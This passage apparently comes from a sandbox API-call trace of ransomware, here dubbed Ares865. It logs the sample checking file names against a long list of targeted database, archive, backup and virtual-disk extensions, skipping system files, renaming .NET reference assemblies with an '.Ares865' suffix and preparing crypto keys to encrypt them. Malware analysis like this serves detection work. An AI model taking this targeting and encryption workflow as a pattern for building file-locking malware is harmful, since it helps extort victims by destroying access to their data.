(lpString1="ing.dll", lpString2="mdbhtml") returned -1 [0124.178] lstrlenW (lpString="mdn") returned 3 [0124.178] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0124.178] lstrlenW (lpString="mdt") returned 3 [0124.178] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0124.178] lstrlenW (lpString="mfd") returned 3 [0124.178] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0124.178] lstrlenW (lpString="mpd") returned 3 [0124.178] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0124.178] lstrlenW (lpString="mrg") returned 3 [0124.178] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0124.178] lstrlenW (lpString="mud") returned 3 [0124.178] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0124.178] lstrlenW (lpString="mwb") returned 3 [0124.178] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0124.178] lstrlenW (lpString="myd") returned 3 [0124.178] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0124.178] lstrlenW (lpString="ndf") returned 3 [0124.178] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0124.178] lstrlenW (lpString="nnt") returned 3 [0124.178] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0124.178] lstrlenW (lpString="nrmlib") returned 6 [0124.178] lstrcmpiW (lpString1="ng.dll", lpString2="nrmlib") returned -1 [0124.178] lstrlenW (lpString="ns2") returned 3 [0124.178] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0124.178] lstrlenW (lpString="ns3") returned 3 [0124.179] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0124.179] lstrlenW (lpString="ns4") returned 3 [0124.179] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0124.179] lstrlenW (lpString="nsf") returned 3 [0124.179] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0124.179] lstrlenW (lpString="nv") returned 2 [0124.179] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0124.179] lstrlenW (lpString="nv2") returned 3 [0124.179] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0124.179] lstrlenW (lpString="nwdb") returned 4 [0124.179] lstrcmpiW (lpString1=".dll", lpString2="nwdb") returned -1 [0124.179] lstrlenW (lpString="nyf") returned 3 [0124.179] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0124.179] lstrlenW (lpString="odb") returned 3 [0124.179] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0124.179] lstrlenW (lpString="odb") returned 3 [0124.179] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0124.179] lstrlenW (lpString="oqy") returned 3 [0124.179] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0124.179] lstrlenW (lpString="ora") returned 3 [0124.179] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0124.179] lstrlenW (lpString="orx") returned 3 [0124.179] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0124.179] lstrlenW (lpString="owc") returned 3 [0124.179] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0124.179] lstrlenW (lpString="p96") returned 3 [0124.179] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0124.179] lstrlenW (lpString="p97") returned 3 [0124.179] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0124.179] lstrlenW (lpString="pan") returned 3 [0124.179] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0124.179] lstrlenW (lpString="pdb") returned 3 [0124.179] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0124.180] lstrlenW (lpString="pdm") returned 3 [0124.180] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0124.180] lstrlenW (lpString="pnz") returned 3 [0124.180] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0124.180] lstrlenW (lpString="qry") returned 3 [0124.180] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0124.180] lstrlenW (lpString="qvd") returned 3 [0124.180] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0124.180] lstrlenW (lpString="rbf") returned 3 [0124.180] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0124.180] lstrlenW (lpString="rctd") returned 4 [0124.180] lstrcmpiW (lpString1=".dll", lpString2="rctd") returned -1 [0124.180] lstrlenW (lpString="rod") returned 3 [0124.180] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0124.180] lstrlenW (lpString="rodx") returned 4 [0124.180] lstrcmpiW (lpString1=".dll", lpString2="rodx") returned -1 [0124.180] lstrlenW (lpString="rpd") returned 3 [0124.180] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0124.180] lstrlenW (lpString="rsd") returned 3 [0124.180] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0124.180] lstrlenW (lpString="sas7bdat") returned 8 [0124.180] lstrcmpiW (lpString1="ting.dll", lpString2="sas7bdat") returned 1 [0124.180] lstrlenW (lpString="sbf") returned 3 [0124.180] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0124.180] lstrlenW (lpString="scx") returned 3 [0124.180] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0124.180] lstrlenW (lpString="sdb") returned 3 [0124.180] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0124.180] lstrlenW (lpString="sdc") returned 3 [0124.180] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0124.180] lstrlenW (lpString="sdf") returned 3 [0124.180] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0124.180] lstrlenW (lpString="sis") returned 3 [0124.180] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0124.181] lstrlenW (lpString="spq") returned 3 [0124.181] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0124.181] lstrlenW (lpString="te") returned 2 [0124.181] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0124.181] lstrlenW (lpString="teacher") returned 7 [0124.181] lstrcmpiW (lpString1="ing.dll", lpString2="teacher") returned -1 [0124.181] lstrlenW (lpString="tmd") returned 3 [0124.181] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0124.181] lstrlenW (lpString="tps") returned 3 [0124.181] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0124.181] lstrlenW (lpString="trc") returned 3 [0124.181] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0124.181] lstrlenW (lpString="trc") returned 3 [0124.181] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0124.181] lstrlenW (lpString="trm") returned 3 [0124.181] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0124.181] lstrlenW (lpString="udb") returned 3 [0124.181] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0124.181] lstrlenW (lpString="udl") returned 3 [0124.181] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0124.181] lstrlenW (lpString="usr") returned 3 [0124.181] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0124.181] lstrlenW (lpString="v12") returned 3 [0124.181] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0124.181] lstrlenW (lpString="vis") returned 3 [0124.181] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0124.181] lstrlenW (lpString="vpd") returned 3 [0124.181] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0124.181] lstrlenW (lpString="vvv") returned 3 [0124.181] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0124.181] lstrlenW (lpString="wdb") returned 3 [0124.181] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0124.181] lstrlenW (lpString="wmdb") returned 4 [0124.181] lstrcmpiW (lpString1=".dll", lpString2="wmdb") returned -1 [0124.182] lstrlenW (lpString="wrk") returned 3 [0124.182] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0124.182] lstrlenW (lpString="xdb") returned 3 [0124.182] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0124.182] lstrlenW (lpString="xld") returned 3 [0124.182] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0124.182] lstrlenW (lpString="xmlff") returned 5 [0124.182] lstrcmpiW (lpString1="g.dll", lpString2="xmlff") returned -1 [0124.182] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll.Ares865") returned 99 [0124.182] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.routing.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.routing.dll.ares865"), dwFlags=0x1) returned 1 [0124.185] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.routing.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.185] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=61440) returned 1 [0124.185] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.186] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.186] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.187] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf300, lpName=0x0) returned 0x170 [0124.188] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf300) returned 0x190000 [0124.193] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.194] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.194] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.196] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Windows.Presentation.dll" | out: lpString1="System.Windows.Presentation.dll") returned="System.Windows.Presentation.dll" [0124.196] lstrlenW (lpString="System.Windows.Presentation.dll") returned 31 [0124.196] lstrlenW (lpString="Ares865") returned 7 [0124.196] lstrcmpiW (lpString1="ion.dll", lpString2="Ares865") returned 1 [0124.196] lstrlenW (lpString=".dll") returned 4 [0124.196] lstrcmpiW (lpString1="System.Windows.Presentation.dll", lpString2=".dll") returned 1 [0124.196] lstrlenW (lpString=".lnk") returned 4 [0124.196] lstrcmpiW (lpString1="System.Windows.Presentation.dll", lpString2=".lnk") returned 1 [0124.196] lstrlenW (lpString=".ini") returned 4 [0124.196] lstrcmpiW (lpString1="System.Windows.Presentation.dll", lpString2=".ini") returned 1 [0124.196] lstrlenW (lpString=".sys") returned 4 [0124.196] lstrcmpiW (lpString1="System.Windows.Presentation.dll", lpString2=".sys") returned 1 [0124.196] lstrlenW (lpString="System.Windows.Presentation.dll") returned 31 [0124.196] lstrlenW (lpString="bak") returned 3 [0124.196] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0124.196] lstrlenW (lpString="ba_") returned 3 [0124.196] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0124.196] lstrlenW (lpString="dbb") returned 3 [0124.196] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0124.196] lstrlenW (lpString="vmdk") returned 4 [0124.196] lstrcmpiW (lpString1=".dll", lpString2="vmdk") returned -1 [0124.196] lstrlenW (lpString="rar") returned 3 [0124.196] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0124.196] lstrlenW (lpString="zip") returned 3 [0124.196] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0124.196] lstrlenW (lpString="tgz") returned 3 [0124.196] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0124.196] lstrlenW (lpString="vbox") returned 4 [0124.196] lstrcmpiW (lpString1=".dll", lpString2="vbox") returned -1 [0124.196] lstrlenW (lpString="vdi") returned 3 [0124.196] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0124.196] lstrlenW (lpString="vhd") returned 3 [0124.196] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0124.197] lstrlenW (lpString="vhdx") returned 4 [0124.197] lstrcmpiW (lpString1=".dll", lpString2="vhdx") returned -1 [0124.197] lstrlenW (lpString="avhd") returned 4 [0124.197] lstrcmpiW (lpString1=".dll", lpString2="avhd") returned -1 [0124.197] lstrlenW (lpString="db") returned 2 [0124.197] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0124.197] lstrlenW (lpString="db2") returned 3 [0124.197] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0124.197] lstrlenW (lpString="db3") returned 3 [0124.197] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0124.197] lstrlenW (lpString="dbf") returned 3 [0124.197] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0124.197] lstrlenW (lpString="mdf") returned 3 [0124.197] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0124.197] lstrlenW (lpString="mdb") returned 3 [0124.197] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0124.197] lstrlenW (lpString="sql") returned 3 [0124.197] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0124.197] lstrlenW (lpString="sqlite") returned 6 [0124.197] lstrcmpiW (lpString1="on.dll", lpString2="sqlite") returned -1 [0124.197] lstrlenW (lpString="sqlite3") returned 7 [0124.197] lstrcmpiW (lpString1="ion.dll", lpString2="sqlite3") returned -1 [0124.197] lstrlenW (lpString="sqlitedb") returned 8 [0124.197] lstrcmpiW (lpString1="tion.dll", lpString2="sqlitedb") returned 1 [0124.197] lstrlenW (lpString="xml") returned 3 [0124.197] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0124.197] lstrlenW (lpString="$er") returned 3 [0124.197] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0124.197] lstrlenW (lpString="4dd") returned 3 [0124.197] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0124.197] lstrlenW (lpString="4dl") returned 3 [0124.197] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0124.197] lstrlenW (lpString="^^^") returned 3 [0124.197] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0124.197] lstrlenW (lpString="abs") returned 3 [0124.198] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0124.198] lstrlenW (lpString="abx") returned 3 [0124.198] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0124.198] lstrlenW (lpString="accdb") returned 5 [0124.198] lstrcmpiW (lpString1="n.dll", lpString2="accdb") returned 1 [0124.198] lstrlenW (lpString="accdc") returned 5 [0124.198] lstrcmpiW (lpString1="n.dll", lpString2="accdc") returned 1 [0124.198] lstrlenW (lpString="accde") returned 5 [0124.198] lstrcmpiW (lpString1="n.dll", lpString2="accde") returned 1 [0124.198] lstrlenW (lpString="accdr") returned 5 [0124.198] lstrcmpiW (lpString1="n.dll", lpString2="accdr") returned 1 [0124.198] lstrlenW (lpString="accdt") returned 5 [0124.198] lstrcmpiW (lpString1="n.dll", lpString2="accdt") returned 1 [0124.198] lstrlenW (lpString="accdw") returned 5 [0124.198] lstrcmpiW (lpString1="n.dll", lpString2="accdw") returned 1 [0124.198] lstrlenW (lpString="accft") returned 5 [0124.198] lstrcmpiW (lpString1="n.dll", lpString2="accft") returned 1 [0124.198] lstrlenW (lpString="adb") returned 3 [0124.198] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0124.198] lstrlenW (lpString="adb") returned 3 [0124.198] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0124.198] lstrlenW (lpString="ade") returned 3 [0124.198] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0124.198] lstrlenW (lpString="adf") returned 3 [0124.198] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0124.198] lstrlenW (lpString="adn") returned 3 [0124.198] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0124.198] lstrlenW (lpString="adp") returned 3 [0124.198] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0124.198] lstrlenW (lpString="alf") returned 3 [0124.198] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0124.198] lstrlenW (lpString="ask") returned 3 [0124.198] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0124.199] lstrlenW (lpString="btr") returned 3 [0124.199] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0124.199] lstrlenW (lpString="cat") returned 3 [0124.199] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0124.199] lstrlenW (lpString="cdb") returned 3 [0124.199] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0124.199] lstrlenW (lpString="ckp") returned 3 [0124.199] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0124.199] lstrlenW (lpString="cma") returned 3 [0124.199] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0124.199] lstrlenW (lpString="cpd") returned 3 [0124.199] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0124.199] lstrlenW (lpString="dacpac") returned 6 [0124.199] lstrcmpiW (lpString1="on.dll", lpString2="dacpac") returned 1 [0124.199] lstrlenW (lpString="dad") returned 3 [0124.199] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0124.199] lstrlenW (lpString="dadiagrams") returned 10 [0124.199] lstrcmpiW (lpString1="tation.dll", lpString2="dadiagrams") returned 1 [0124.199] lstrlenW (lpString="daschema") returned 8 [0124.199] lstrcmpiW (lpString1="tion.dll", lpString2="daschema") returned 1 [0124.199] lstrlenW (lpString="db-journal") returned 10 [0124.199] lstrcmpiW (lpString1="tation.dll", lpString2="db-journal") returned 1 [0124.199] lstrlenW (lpString="db-shm") returned 6 [0124.199] lstrcmpiW (lpString1="on.dll", lpString2="db-shm") returned 1 [0124.199] lstrlenW (lpString="db-wal") returned 6 [0124.199] lstrcmpiW (lpString1="on.dll", lpString2="db-wal") returned 1 [0124.199] lstrlenW (lpString="dbc") returned 3 [0124.199] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0124.199] lstrlenW (lpString="dbs") returned 3 [0124.199] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0124.199] lstrlenW (lpString="dbt") returned 3 [0124.199] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0124.199] lstrlenW (lpString="dbv") returned 3 [0124.199] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0124.199] lstrlenW (lpString="dbx") returned 3 [0124.200] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0124.200] lstrlenW (lpString="dcb") returned 3 [0124.200] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0124.200] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll.Ares865") returned 108 [0124.200] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.windows.presentation.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.windows.presentation.dll.ares865"), dwFlags=0x1) returned 1 [0124.203] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.windows.presentation.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.203] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12288) returned 1 [0124.203] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.204] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.204] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.204] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3300, lpName=0x0) returned 0x170 [0124.206] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3300) returned 0x190000 [0124.207] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.208] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.208] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.209] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.WorkflowServices.dll" | out: lpString1="System.WorkflowServices.dll") returned="System.WorkflowServices.dll" [0124.209] lstrlenW (lpString="System.WorkflowServices.dll") returned 27 [0124.209] lstrlenW (lpString="Ares865") returned 7 [0124.209] lstrcmpiW (lpString1="ces.dll", lpString2="Ares865") returned 1 [0124.209] lstrlenW (lpString=".dll") returned 4 [0124.209] lstrcmpiW (lpString1="System.WorkflowServices.dll", lpString2=".dll") returned 1 [0124.209] lstrlenW (lpString=".lnk") returned 4 [0124.209] lstrcmpiW (lpString1="System.WorkflowServices.dll", lpString2=".lnk") returned 1 [0124.209] lstrlenW (lpString=".ini") returned 4 [0124.209] lstrcmpiW (lpString1="System.WorkflowServices.dll", lpString2=".ini") returned 1 [0124.209] lstrlenW (lpString=".sys") returned 4 [0124.209] lstrcmpiW (lpString1="System.WorkflowServices.dll", lpString2=".sys") returned 1 [0124.209] lstrlenW (lpString="System.WorkflowServices.dll") returned 27 [0124.209] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll.Ares865") returned 104 [0124.209] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.workflowservices.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.workflowservices.dll.ares865"), dwFlags=0x1) returned 1 [0124.211] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.workflowservices.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.212] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=507904) returned 1 [0124.212] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.213] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.213] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.213] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c300, lpName=0x0) returned 0x170 [0124.215] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c300) returned 0x420000 [0124.234] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.235] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.235] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.242] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Xml.Linq.dll" | out: lpString1="System.Xml.Linq.dll") returned="System.Xml.Linq.dll" [0124.242] lstrlenW (lpString="System.Xml.Linq.dll") returned 19 [0124.242] lstrlenW (lpString="Ares865") returned 7 [0124.242] lstrcmpiW (lpString1="inq.dll", lpString2="Ares865") returned 1 [0124.242] lstrlenW (lpString=".dll") returned 4 [0124.242] lstrcmpiW (lpString1="System.Xml.Linq.dll", lpString2=".dll") returned 1 [0124.242] lstrlenW (lpString=".lnk") returned 4 [0124.243] lstrcmpiW (lpString1="System.Xml.Linq.dll", lpString2=".lnk") returned 1 [0124.243] lstrlenW (lpString=".ini") returned 4 [0124.243] lstrcmpiW (lpString1="System.Xml.Linq.dll", lpString2=".ini") returned 1 [0124.243] lstrlenW (lpString=".sys") returned 4 [0124.243] lstrcmpiW (lpString1="System.Xml.Linq.dll", lpString2=".sys") returned 1 [0124.243] lstrlenW (lpString="System.Xml.Linq.dll") returned 19 [0124.243] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll.Ares865") returned 96 [0124.243] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.xml.linq.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.xml.linq.dll.ares865"), dwFlags=0x1) returned 1 [0124.245] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.xml.linq.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.245] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=139264) returned 1 [0124.245] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.246] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.246] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.246] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x22300, lpName=0x0) returned 0x170 [0124.256] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x22300) returned 0x420000 [0124.262] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.263] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.263] 